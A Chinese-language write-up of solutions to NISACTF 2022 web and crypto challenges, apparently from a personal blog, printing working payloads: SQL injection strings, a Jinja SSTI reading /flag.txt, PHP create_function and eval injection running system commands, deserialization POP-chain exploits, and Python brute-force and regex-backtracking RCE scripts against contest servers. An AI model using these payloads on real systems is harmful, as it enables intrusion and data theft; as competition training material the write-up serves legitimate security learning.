[NISACTF 2022]

WEB

checkin

打开一看,本来一位就是简单的一道get传参题,结果发现复制的时候出现了问题

image-20220331153054842

所以我就把代码复制到vscode上面来

image-20220331153155844

发现存在Unicode特殊字符,直接把字符原样复制下来,然后URLencode编码一下

最终payload
    ?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%A9%E2%81%A6N1SACTF

image-20220331153438591

level-up

这是一道php特性的题,一共有五个姿势点

level-1

image-20220331153501771

打开一看,什么都没有,crtl+U查看源代码,发现有提示disallow:这个就是robots.txt内容的格式,接着我们就去访问一下

image-20220331153619418

level_2_1s_h3re.php

level-2

image-20220331153802692

这是一道很常见的哈希强比较,且禁用了数组,但是有现成的payload,平时练习积攒的,所以这个时候直接拿来用就行了

MD5

a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2


&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

SHA1




array1=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1

&array2=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1

image-20220331155039106

Level___3.php

level-3

image-20220331155127552

跟上一关一样,直接拿payload一把梭

image-20220331204014771

level_level_4.php

level-4

<?php
//here is last level
    error_reporting(0);
    include "str.php";
    show_source(__FILE__);

    $str = parse_url($_SERVER['REQUEST_URI']);
    if($str['query'] == ""){
        echo "give me a parameter";
    }
    if(preg_match('/ |_|20|5f|2e|\./',$str['query'])){
        die("blacklist here");
    }
    if($_GET['NI_SA_'] === "txw4ever"){
        die($level5);
    }
    else{
        die("level 4 failed ...");
    }

?> 

这个考点就是php传参的时候会对那些不规范不合法的符号转换为_

主要有以下几个符号

在php中变量名字是由数字字母和下划线组成的,所以不论用post还是get传入变量名的时候都将空格、+、点、[转换为下划线,但是用一个特性是可以绕过的,就是当[提前出现后,后面的点就不会再被转义了,such as:`CTF[SHOW.COM`=>`CTF_SHOW.COM`

这里刚好+号没有被过滤

image-20220331204341600

后来看了一下官方解,原来是考parse_url的解析缺陷

所以构造出另外一个payload如下

http://1.14.71.254:28023///level_level_4.php?NI_SA_=txw4ever

55_5_55.php

level-5

image-20220331204704476

create_function注入,没啥好说的,直接一把梭吧

image-20220331204851374

image-20220331205015871

?a=\create_function&b=}system('tac /flag');//

bingdundun~

点开后有个upload按钮,按下后url发生了变化

image-20220331214617097

尝试把upload修改成index

image-20220331214654958

很明显是一个文件包含漏洞,而且需要配合文件上传使用,这里应该是自动在参数后面添加一个.php,而且文件只能上传图片和压缩包,一般来讲,文件上传的题只会让你上传图片,而这里多出来一个压缩包,就要想到这相关的协议。比如zip://phar://,这里我用到的是phar伪协议

image-20220331215153369

image-20220331215325886

读取bingdundun_ffllllllag.php文件发现是一个file_get_contents读取/flag?,然后cat根目录

image-20220331215557423

sign_crypto

join-us

image-20220401123946619

登陆界面一打开就有这样一个界面,应该这就是提示了,一个查询框,首先想到的就是sql注入

image-20220401124156260

发现存在sql注入,且数据库中至少存在三条数据

然后fuzz了一下,大概过滤了以下这些关键字

image-20220401201637287

联合注入被ban了,if也没有,看了一下报错注入没有过滤extractvalue,所以就尝试报错注入,and被ban干净了,or没有被ban。

所以尝试如下

tt=1'|| extractvalue(1,concat('~',(select * from aa),'~'))%23

image-20220401202627376

image-20220401202612854

这里不知道为啥or为啥被ban了,但是可以用||代替,然后database被ban了,可以使用这种方法查询到当前数据库名

image-20220401202912537

过滤了等于号,直接用like代替,

爆表名
tt=1'|| extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema like 'sqlsql'),'~'))%23
Fal_flag,output

爆列名的时候发现column关键字被ban,所以就尝试无列名注入

爆列名
tt=1'|| extractvalue(1,concat('~',(select * from (select * from output a join output)c),'~'))%23
data

tt=1'|| extractvalue(1,concat('~',(select * from (select * from Fal_flag a join Fal_flag)c),'~'))%23
id

image-20220401205846912

image-20220401205917546

所以优先查询output列

image-20220401210119896

最终payload

tt=1'|| extractvalue(1,concat('~',(select mid(data,1,20) from output),'~'))%23
NSSCTF{2d21e3f5-90b0
21e3f5-90b0-4330-98c
0-4330-98ca-a1becc60
a-a1becc602f94}
NSSCTF{2d21e3f5-90b0-4330-98ca-a1becc602f94}

不愉快的地方

is secret

扫描目录,发现

image-20220331221038131

image-20220331221120806

看着这个好像有点熟悉,好像那个BUU就有类似的题,这个传入了一个参数,他给我报错了,并且给了我报错信息,发现是flask,且python2.7版本

然后后面测试了一下,发现参数长度大于等于5之后会报错,加密方式不知

image-20220331221530971

在这里可以看到主文件app/app.py的报错信息如上,知道了是RC4加密,且密钥可知

HereIsTreasure后面为

a=render_template_string(safe(deS))

猜测是模板注入,safe应该是一个过滤函数,所以直接将payloadRC4加密之后传入其中就可以了

ssti的payload如下

{{''.__class__.__mro__.__getitem__(2).__subclasses__().pop(40)('/flag.txt').read()}}

其中使用的是file方法

a="<type 'type'>, <type 'weakref'>, <type 'weakcallableproxy'>, <type 'weakproxy'>, <type 'int'>, <type 'basestring'>, <type 'bytearray'>, <type 'list'>, <type 'NoneType'>, <type 'NotImplementedType'>, <type 'traceback'>, <type 'super'>, <type 'xrange'>, <type 'dict'>, <type 'set'>, <type 'slice'>, <type 'staticmethod'>, <type 'complex'>, <type 'float'>, <type 'buffer'>, <type 'long'>, <type 'frozenset'>, <type 'property'>, <type 'memoryview'>, <type 'tuple'>, <type 'enumerate'>, <type 'reversed'>, <type 'code'>, <type 'frame'>, <type 'builtin_function_or_method'>, <type 'instancemethod'>, <type 'function'>, <type 'classobj'>, <type 'dictproxy'>, <type 'generator'>, <type 'getset_descriptor'>, <type 'wrapper_descriptor'>, <type 'instance'>, <type 'ellipsis'>, <type 'member_descriptor'>, <type 'file'>, <type 'PyCapsule'>, <type 'cell'>, <type 'callable-iterator'>, <type 'iterator'>, <type 'sys.long_info'>, <type 'sys.float_info'>, <type 'EncodingMap'>, <type 'fieldnameiterator'>, <type 'formatteriterator'>, <type 'sys.version_info'>, <type 'sys.flags'>, <type 'exceptions.BaseException'>, <type 'module'>, <type 'imp.NullImporter'>, <type 'zipimport.zipimporter'>, <type 'posix.stat_result'>, <type 'posix.statvfs_result'>, <class 'warnings.WarningMessage'>, <class 'warnings.catch_warnings'>, <class '_weakrefset._IterationGuard'>, <class '_weakrefset.WeakSet'>, <class '_abcoll.Hashable'>, <type 'classmethod'>, <class '_abcoll.Iterable'>, <class '_abcoll.Sized'>, <class '_abcoll.Container'>, <class '_abcoll.Callable'>, <type 'dict_keys'>, <type 'dict_items'>, <type 'dict_values'>, <class 'site._Printer'>, <class 'site._Helper'>, <type '_sre.SRE_Pattern'>, <type '_sre.SRE_Match'>, <type '_sre.SRE_Scanner'>, <class 'site.Quitter'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <type '_io._IOBase'>, <type '_io.IncrementalNewlineDecoder'>, <type 'functools.partial'>, <type '_ssl._SSLContext'>, <type '_ssl._SSLSocket'>, <type 'cStringIO.StringO'>, <type 'cStringIO.StringI'>, <class 'socket._closedsocket'>, <type '_socket.socket'>, <type 'method_descriptor'>, <class 'socket._socketobject'>, <class 'socket._fileobject'>, <type 'datetime.date'>, <type 'datetime.timedelta'>, <type 'datetime.time'>, <type 'datetime.tzinfo'>, <type 'operator.itemgetter'>, <type 'operator.attrgetter'>, <type 'operator.methodcaller'>, <type 'collections.deque'>, <type 'deque_iterator'>, <type 'deque_reverse_iterator'>, <type 'itertools.combinations'>, <type 'itertools.combinations_with_replacement'>, <type 'itertools.cycle'>, <type 'itertools.dropwhile'>, <type 'itertools.takewhile'>, <type 'itertools.islice'>, <type 'itertools.starmap'>, <type 'itertools.imap'>, <type 'itertools.chain'>, <type 'itertools.compress'>, <type 'itertools.ifilter'>, <type 'itertools.ifilterfalse'>, <type 'itertools.count'>, <type 'itertools.izip'>, <type 'itertools.izip_longest'>, <type 'itertools.permutations'>, <type 'itertools.product'>, <type 'itertools.repeat'>, <type 'itertools.groupby'>, <type 'itertools.tee_dataobject'>, <type 'itertools.tee'>, <type 'itertools._grouper'>, <type '_thread._localdummy'>, <type 'thread._local'>, <type 'thread.lock'>, <class 'string.Template'>, <class 'string.Formatter'>, <type 'time.struct_time'>, <class 'threading._Verbose'>, <class 'logging.LogRecord'>, <class 'logging.Formatter'>, <class 'logging.BufferingFormatter'>, <class 'logging.Filter'>, <class 'logging.Filterer'>, <class 'logging.PlaceHolder'>, <class 'logging.Manager'>, <class 'logging.LoggerAdapter'>, <class 'werkzeug._internal._Missing'>, <class 'werkzeug._internal._DictAccessorProperty'>, <class 'werkzeug.utils.HTMLBuilder'>, <class 'werkzeug.exceptions.Aborter'>, <class 'werkzeug.urls.Href'>, <type 'select.epoll'>, <type '_hashlib.HASH'>, <type '_random.Random'>, <class 'contextlib.GeneratorContextManager'>, <class 'contextlib.closing'>, <type 'Struct'>, <class 'click._compat._FixupStream'>, <class 'click._compat._AtomicFile'>, <class 'click.utils.LazyFile'>, <class 'click.utils.KeepOpenFile'>, <class 'click.utils.PacifyFlushWrapper'>, <class 'click.parser.Option'>, <class 'click.parser.Argument'>, <class 'click.parser.ParsingState'>, <class 'click.parser.OptionParser'>, <class 'click.types.ParamType'>, <class 'click.formatting.HelpFormatter'>, <class 'click.core.Context'>, <class 'click.core.BaseCommand'>, <class 'click.core.Parameter'>, <class 'werkzeug.serving.WSGIRequestHandler'>, <class 'werkzeug.serving._SSLContext'>, <class 'werkzeug.serving.BaseWSGIServer'>, <class 'urlparse.ResultMixin'>, <class 'werkzeug.datastructures.ImmutableListMixin'>, <class 'werkzeug.datastructures.ImmutableDictMixin'>, <class 'werkzeug.datastructures.UpdateDictMixin'>, <class 'werkzeug.datastructures.ViewItems'>, <class 'werkzeug.datastructures._omd_bucket'>, <class 'werkzeug.datastructures.Headers'>, <class 'werkzeug.datastructures.ImmutableHeadersMixin'>, <class 'werkzeug.datastructures.IfRange'>, <class 'werkzeug.datastructures.Range'>, <class 'werkzeug.datastructures.ContentRange'>, <class 'werkzeug.datastructures.FileStorage'>, <class 'email.LazyImporter'>, <class 'calendar.Calendar'>, <class 'werkzeug.wrappers.accept.AcceptMixin'>, <class 'werkzeug.wrappers.auth.AuthorizationMixin'>, <class 'werkzeug.wrappers.auth.WWWAuthenticateMixin'>, <class 'werkzeug.wsgi.ClosingIterator'>, <class 'werkzeug.wsgi.FileWrapper'>, <class 'werkzeug.wsgi._RangeWrapper'>, <class 'werkzeug.formparser.FormDataParser'>, <class 'werkzeug.formparser.MultiPartParser'>, <class 'werkzeug.wrappers.base_request.BaseRequest'>, <class 'werkzeug.wrappers.base_response.BaseResponse'>, <class 'werkzeug.wrappers.common_descriptors.CommonRequestDescriptorsMixin'>, <class 'werkzeug.wrappers.common_descriptors.CommonResponseDescriptorsMixin'>, <class 'werkzeug.wrappers.etag.ETagRequestMixin'>, <class 'werkzeug.wrappers.etag.ETagResponseMixin'>, <class 'werkzeug.wrappers.cors.CORSRequestMixin'>, <class 'werkzeug.wrappers.cors.CORSResponseMixin'>, <class 'werkzeug.useragents.UserAgentParser'>, <class 'werkzeug.useragents.UserAgent'>, <class 'werkzeug.wrappers.user_agent.UserAgentMixin'>, <class 'werkzeug.wrappers.request.StreamOnlyMixin'>, <class 'werkzeug.wrappers.response.ResponseStream'>, <class 'werkzeug.wrappers.response.ResponseStreamMixin'>, <class 'werkzeug.test._TestCookieHeaders'>, <class 'werkzeug.test._TestCookieResponse'>, <type '_json.Scanner'>, <type '_json.Encoder'>, <class 'json.decoder.JSONDecoder'>, <class 'json.encoder.JSONEncoder'>, <class 'werkzeug.test.EnvironBuilder'>, <class 'werkzeug.test.Client'>, <class 'markupsafe._MarkupEscapeHelper'>, <type 'cPickle.Unpickler'>, <type 'cPickle.Pickler'>, <class 'jinja2.utils.MissingType'>, <class 'jinja2.utils.LRUCache'>, <class 'jinja2.utils.Cycler'>, <class 'jinja2.utils.Joiner'>, <class 'jinja2.utils.Namespace'>, <class 'jinja2.bccache.Bucket'>, <class 'jinja2.bccache.BytecodeCache'>, <class 'jinja2.nodes.EvalContext'>, <class 'jinja2.visitor.NodeVisitor'>, <class 'jinja2.nodes.Node'>, <class 'jinja2.idtracking.Symbols'>, <class 'jinja2.compiler.MacroRef'>, <class 'jinja2.compiler.Frame'>, <class 'jinja2.runtime.TemplateReference'>, <class 'numbers.Number'>, <class 'jinja2.runtime.Context'>, <class 'jinja2.runtime.BlockReference'>, <class 'jinja2.runtime.Macro'>, <class 'jinja2.runtime.Undefined'>, <class 'decimal.Decimal'>, <class 'decimal._ContextManager'>, <class 'decimal.Context'>, <class 'decimal._WorkRep'>, <class 'decimal._Log10Memoize'>, <type '_ast.AST'>, <class 'ast.NodeVisitor'>, <class 'jinja2.lexer.Failure'>, <class 'jinja2.lexer.TokenStreamIterator'>, <class 'jinja2.lexer.TokenStream'>, <class 'jinja2.lexer.Lexer'>, <class 'jinja2.parser.Parser'>, <class 'jinja2.environment.Environment'>, <class 'jinja2.environment.Template'>, <class 'jinja2.environment.TemplateModule'>, <class 'jinja2.environment.TemplateExpression'>, <class 'jinja2.environment.TemplateStream'>, <class 'jinja2.loaders.BaseLoader'>, <class 'difflib.HtmlDiff'>, <class 'uuid.UUID'>, <type 'CArgObject'>, <type '_ctypes.CThunkObject'>, <type '_ctypes._CData'>, <type '_ctypes.CField'>, <type '_ctypes.DictRemover'>, <class 'ctypes.CDLL'>, <class 'ctypes.LibraryLoader'>, <class 'subprocess.Popen'>, <class 'werkzeug.routing.RuleFactory'>, <class 'werkzeug.routing.RuleTemplate'>, <class 'werkzeug.routing.BaseConverter'>, <class 'werkzeug.routing.Map'>, <class 'werkzeug.routing.MapAdapter'>, <class 'werkzeug.local.Local'>, <class 'werkzeug.local.LocalStack'>, <class 'werkzeug.local.LocalManager'>, <class 'werkzeug.local.LocalProxy'>, <class 'flask.signals.Namespace'>, <class 'flask.signals._FakeSignal'>, <class 'flask.helpers.locked_cached_property'>, <class 'flask.helpers._PackageBoundObject'>, <class 'flask.cli.DispatchingApp'>, <class 'flask.cli.ScriptInfo'>, <class 'itsdangerous._json._CompactJSON'>, <class 'itsdangerous.signer.SigningAlgorithm'>, <class 'itsdangerous.signer.Signer'>, <class 'itsdangerous.serializer.Serializer'>, <class 'itsdangerous.url_safe.URLSafeSerializerMixin'>, <class 'flask.config.ConfigAttribute'>, <class 'flask.ctx._AppCtxGlobals'>, <class 'flask.ctx.AppContext'>, <class 'flask.ctx.RequestContext'>, <class 'flask.json.tag.JSONTag'>, <class 'flask.json.tag.TaggedJSONSerializer'>, <class 'flask.sessions.SessionInterface'>, <class 'flask.wrappers.JSONMixin'>, <class 'flask.blueprints.BlueprintSetupState'>, <class 'werkzeug.debug.repr._Helper'>, <class 'jinja2.ext.Extension'>, <class 'jinja2.ext._CommentFinder'>, <class 'werkzeug.debug.repr.DebugReprGenerator'>, <class 'werkzeug.debug.console.HTMLStringO'>, <class 'werkzeug.debug.console.ThreadedStream'>, <class 'werkzeug.debug.console._ConsoleLoader'>, <class 'werkzeug.debug.console.Console'>, <class 'werkzeug.debug.tbtools.Line'>, <class 'werkzeug.debug.tbtools.Traceback'>, <class 'werkzeug.debug.tbtools.Group'>, <class 'werkzeug.debug.tbtools.Frame'>, <class 'werkzeug.debug._ConsoleFrame'>, <class 'werkzeug.debug.DebuggedApplication'>, <class 'werkzeug._reloader.ReloaderLoop'>, <class 'email.feedparser.BufferedSubFile'>, <type 'unicodedata.UCD'>, <type 'array.array'>, <type 'method-wrapper'>".split(", ")
q=0
for i in a:
    print(q,i)
    q+=1

image-20220401123557052

最终payload

secret?secret=.%14%1E%12%C3%A484mg%C2%9C%C3%8B%00%C2%81%C2%8D%C2%B8%C2%97%0B%C2%9EF%3B%C2%88m%C2%AEM5%C2%96%3D%C2%9D%5B%C3%987%C3%AA%12%C2%B4%05%C2%84A%C2%BF%17%C3%9Bh%C3%8F%C2%8F%C3%A1a%0F%C2%AE%09%C2%A0%C2%AEyS%2A%C2%A2d%7C%C2%98/%00%C2%90%C3%A9%03Y%C2%B2%C3%9B%1F%C2%B6H%3D%0A%23%C3%B1%5B%C2%9Cp%C2%AEn%C2%96i%5Dv%7FX%C2%92

babyserialize

 <?php
include "waf.php";
class NISA{
    public $fun="show_me_flag";
    public $txw4ever;
    public function __wakeup()
    {
        if($this->fun=="show_me_flag"){
            hint();
        }
    }

    function __call($from,$val){
        $this->fun=$val[0];
    }

    public function __toString()
    {
        echo $this->fun;
        return " ";
    }
    public function __invoke()
    {
        checkcheck($this->txw4ever);
        @eval($this->txw4ever);
    }
}

class TianXiWei{
    public $ext;
    public $x;
    public function __wakeup()
    {
        $this->ext->nisa($this->x);
    }
}

class Ilovetxw{
    public $huang;
    public $su;

    public function __call($fun1,$arg){
        $this->huang->fun=$arg[0];
    }

    public function __toString(){
        $bb = $this->su;
        return $bb();
    }
}

class four{
    public $a="TXW4EVER";
    private $fun='abc';

    public function __set($name, $value)
    {
        $this->$name=$value;
        if ($this->fun = "sixsixsix"){
            strtolower($this->a);
        }
    }
}

if(isset($_GET['ser'])){
    @unserialize($_GET['ser']);
}else{
    highlight_file(__FILE__);
}

//func checkcheck($data){
//  if(preg_match(......)){
//      die(something wrong);
//  }
//}

//function hint(){
//    echo ".......";
//    die();
//}
?>

一个简单的反序列化,pop链非常好找,入口点就是TianXiWei::__wakeup(),出口点就是NISA:__invoke(),

直接构造出exp如下

<?php
class NISA{
    public $fun;
    public $txw4ever;
}
class TianXiWei{
    public $ext;
    public $x;
}
class Ilovetxw{
    public $huang;
    public $su;
}
class four{
    public $a="TXW4EVER";
    private $fun='abc';
}
$n1=new NISA();
$n2=new NISA();
$t=new TianXiWei();
$i=new Ilovetxw();
$f=new four();

$n2->txw4ever="echo scandir('/')[6].scandir('/')[7].scandir('/')[9].scandir('/')[8].scandir('/')[5];";

$i->su=$n2;

$n1->fun=$i;

$f->a=$n1;

$t->x="sixsixsix";
$t->ext=$f;
echo urlencode(serialize($t));

这里命令执行的时候加了waf,而且还是黑盒测试,最后用scandir[]数组的形式获取到了flag的文件名

image-20220331210313886

然后再用copy命令读文件就行了

copy('/fllllllaaag','1.txt');

image-20220331210535020

image-20220331210537907

后面去看了一下官方解,发现结果是用php原生类,亏我才学完php原生类利用,淦

payload如下

echo new GlobIterator(\"/f*\");
读文件名
$N1->txw4ever = "echo new SplFileObject(\"php://filter/convert.base64-encode/resource=/fllllllaaag\");";
读文件

easyssrf

image-20220331211418920

file协议读文件没读到,提示说/fl4g

image-20220331211456664

提示说有ha1x1ux1u.php文件

image-20220331211525714

打开发现是一道题

image-20220331211723804

没啥难度,直接filter过滤器读文件就行,而且这道题也没考啥SSRF啊,就一个协议题

babyupload

image-20220331212020159

打开题目源码,访问source路径

image-20220331212445364
下载得到一个python文件,可以知道这是一个flask项目,这就开始了审代码环节

from flask import Flask, request, redirect, g, send_from_directory
import sqlite3
import os
import uuid

app = Flask(__name__)

SCHEMA = """CREATE TABLE files (
id text primary key,
path text
);
"""


def db():
    g_db = getattr(g, '_database', None)
    if g_db is None:
        g_db = g._database = sqlite3.connect("database.db")
    return g_db


@app.before_first_request
def setup():
    os.remove("database.db")
    cur = db().cursor()
    cur.executescript(SCHEMA)


@app.route('/')
def hello_world():
    return """<!DOCTYPE html>
<html>
<body>
<form action="/upload" method="post" enctype="multipart/form-data">
    Select image to upload:
    <input type="file" name="file">
    <input type="submit" value="Upload File" name="submit">
</form>
<!-- /source -->
</body>
</html>"""


@app.route('/source')
def source():
    return send_from_directory(directory="/var/www/html/", path="www.zip", as_attachment=True)


@app.route('/upload', methods=['POST'])
def upload():
    if 'file' not in request.files:
        return redirect('/')
    file = request.files['file']
    if "." in file.filename:
        return "Bad filename!", 403
    conn = db()
    cur = conn.cursor()
    uid = uuid.uuid4().hex
    try:
        cur.execute("insert into files (id, path) values (?, ?)", (uid, file.filename,))
    except sqlite3.IntegrityError:
        return "Duplicate file"
    conn.commit()

    file.save('uploads/' + file.filename)
    return redirect('/file/' + uid)


@app.route('/file/<id>')
def file(id):
    conn = db()
    cur = conn.cursor()
    cur.execute("select path from files where id=?", (id,))
    res = cur.fetchone()
    if res is None:
        return "File not found", 404

    # print(res[0])

    with open(os.path.join("uploads/", res[0]), "r") as f:
        return f.read()


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)
with open(os.path.join("uploads/", res[0]), "r") as f:
        return f.read()

主要漏洞在这里

image-20220331214043421

也就是说,我们让res[0]为/flag就行了

image-20220331214326734

image-20220331214334196

image-20220331214338871

hardsql

题目描述:

$password=$_POST['passwd'];
$sql="SELECT passwd FROM users WHERE username='bilala' and passwd='$password';";

题目描述看起来非常简单,但是估计上了一个强的waf

image-20220401215104774

打开题目,描述的是,登陆成功就能拿到flag,所以就不需要注入了,只要让他查询到数据就行

image-20220401215353756

也就是说存在用户bilala

image-20220401215444255

存在waf,fuzz一下

image-20220401215723394

过滤得有点多,简单看一下那几个常见的注入方式

好像大部分都被ban了,而且不能用万能密码了

这里可以使用模糊匹配,用like,而且是已知列名passwd和表名users

image-20220401220722696

成功匹配到第一位为b

写个python脚本跑一下密码

import requests

url = 'http://1.14.71.254:28042/login.php'
dict = '0123456789qwertyuiopasdfghjklzxcvbnm-'
flag = ''
for j in range(50):
    for i in dict:
        data = {
            "username": "bilala",
            "passwd": f"-1'/**/or/**/passwd/**/like/**/'{flag+i}%'#"
        }
        # print(data)
        res = requests.post(url=url, data=data)
        # print(res.text)
        if 'nothing found' not in res.text:
            # print(i)
            # print(res.text)
            flag+=i
            print(flag)
            break

image-20220401221712164

密码为

b2f2d15b3ae082ca29697d8dcd420fd7

image-20220401221759050

登陆进去拿到源码,真就亿点过滤

这里拿到flag的条件就是密码不为b2f2d15b3ae082ca29697d8dcd420fd7且能登陆成功,这不就是buu上的那道原题吗,用replace构造相同的输入和输出

直接拿那个时候的payload来打一下

'/**/union/**/select/**/replace(replace('"/**/union/**/select/**/replace(replace("%",0x22,0x27),0x25,"%")#',0x22,0x27),0x25,'"/**/union/**/select/**/replace(replace("%",0x22,0x27),0x25,"%")#')
此为官方的payload

image-20220401222746628

middlerce

<?php
include "check.php";
if (isset($_REQUEST['letter'])){
    $txw4ever = $_REQUEST['letter'];
    if (preg_match('/^.*([\w]|\^|\*|\(|\~|\`|\?|\/| |\||\&|!|\<|\>|\{|\x09|\x0a|\[).*$/m',$txw4ever)){
        die("再加把油喔");
    }
    else{
        $command = json_decode($txw4ever,true)['cmd'];
        checkdata($command);
        @eval($command);
    }
}
else{
    highlight_file(__FILE__);
}
?>

过滤

/^.*([\w]|\^|\*|\(|\~|\`|\?|\/| |\||\&|!|\<|\>|\{|\x09|\x0a|\[).*$/m

这里可以采用正则回溯绕过,可以参考https://www.freebuf.com/articles/web/190794.html

image-20220401213730338

exp

import requests

url = 'http://1.14.71.254:28288/'
payload = '{"cmd":"?><?=`tail /f*`?>","+":"' + '+' * 1000000 + '"}'
# print(payload)
res = requests.post(url=url, data={"letter": payload})
print(res.text)

midlevel

image-20220401214022052

打开一看,我寻思这不是原题吗,BUU上有一道差不多的smarty注入,xff构造

我试着直接打一下

image-20220401214305051

很显然可以,试一下能不能用判断语句执行命令

image-20220401214432298

接下来就是命令执行了

image-20220401214519387

OK,纯纯的原题

popchains

Happy New Year~ MAKE A WISH
<?php

echo 'Happy New Year~ MAKE A WISH<br>';

if(isset($_GET['wish'])){
    @unserialize($_GET['wish']);
}
else{
    $a=new Road_is_Long;
    highlight_file(__FILE__);
}
/***************************pop your 2022*****************************/

class Road_is_Long{
    public $page;
    public $string;
    public function __construct($file='index.php'){
        $this->page = $file;
    }
    public function __toString(){
        return $this->string->page;
    }

    public function __wakeup(){
        if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
            echo "You can Not Enter 2022";
            $this->page = "index.php";
        }
    }
}

class Try_Work_Hard{
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Make_a_Change{
    public $effort;
    public function __construct(){
        $this->effort = array();
    }

    public function __get($key){
        $function = $this->effort;
        return $function();
    }
}
/**********************Try to See flag.php*****************************/

一道pop链的题,非常简单,直接一把梭出exp


class Road_is_Long{
public $page;
public $string;
}

class Try_Work_Hard{
protected $var="php://filter/read=convert.base64-encode/resource=index.php";
}

class Make_a_Change{
public $effort;
}
$road1=new Road_is_Long();
$road2=new Road_is_Long();
$try=new Try_Work_Hard();
$make=new Make_a_Change();



$make->effort=$try;
$road2->string=$make;
$road1->page=$road2;
$ser=serialize($road1);
echo urlencode($ser);

image-20220401224029914

payload

?wish=O%3A12%3A"Road_is_Long"%3A2%3A{s%3A4%3A"page"%3BO%3A12%3A"Road_is_Long"%3A2%3A{s%3A4%3A"page"%3BN%3Bs%3A6%3A"string"%3BO%3A13%3A"Make_a_Change"%3A1%3A{s%3A6%3A"effort"%3BO%3A13%3A"Try_Work_Hard"%3A1%3A{s%3A6%3A"%00*%00var"%3Bs%3A62%3A"php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3D..%2F..%2F..%2Fflag"%3B}}}s%3A6%3A"string"%3BN%3B}

Crypto

sign_crypto

task

此为LaTeX字符,直接拿到网站上去识别一下,或者是自己对照表一一替换

image-20220403165654227

然后得到以下字符

\ni \Sigma \Sigma \chi \Theta \forall\left\{\eta \diamond \infty \tau_{n i s a} \widehat{\lambda i} \int \hookleftarrow \hookleftarrow^{\prime} \Lambda \tau \ell \Xi\right\}

观察每一个字符的首字母可以发现,前六位分别为NSSCTF后面就是花括号了,所以说这个flag就是表对应的字符的首字符了

所以写出对应的flag如下

NSSCTF{EDIT_WLIHHPLTEXR}

image-20220403170128923

考虑到flag应该是有意义的,所以针对edit后面的字符,手动去对照表一次,,这个过程有点费眼睛,慢慢看,我的建议是在网站对照,然后编辑,因为涉及到有些符号长得特别像,这个时候就要根据结果去猜了

image-20220403171330078

由此得到新的flag

NSSCTF{EDIT_WITH_LATEX}

所以还是人工看比较准确

normal

题目

..... ..... ..... ...!? !!.?. ..... ..... ..... ..?.? !.?.. ..... .....
..... ..... !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?. ..... .....
..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... .....
!.!!! .?... ..... ..... !?!!. ?.... ..... ...?. ?!.?. ..... !.?.. .....
....! ?!!.? ..... ..... ?.?!. ?!.?. ..... ..... ..... .!?!! .?!!! !!!!!
!!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... .!... ....! .?... ..... .....
!?!!. ?.... ..... ...?. ?!.?. .!.?. ..... ..... !?!!. ?.... ..... .?.?!
.?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!!
!.!.. ..... ..... .!.?. ..... ..... ..!?! !.?.. ..... ..... ?.?!. ?....
..... ..... ....! .!!!! !!!!! !!!!! !.?.. ..... ....! ?!!.? ..... .....
?.?!. ?!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!!
!!!!! .!... ..... ..... !.... ...!. ?.... ..... ..!?! !.?.. ..... ...?.
?!.?. ..... ..... ..... ....! .?... ..... ...!? !!.?. ..... ....? .?!.?
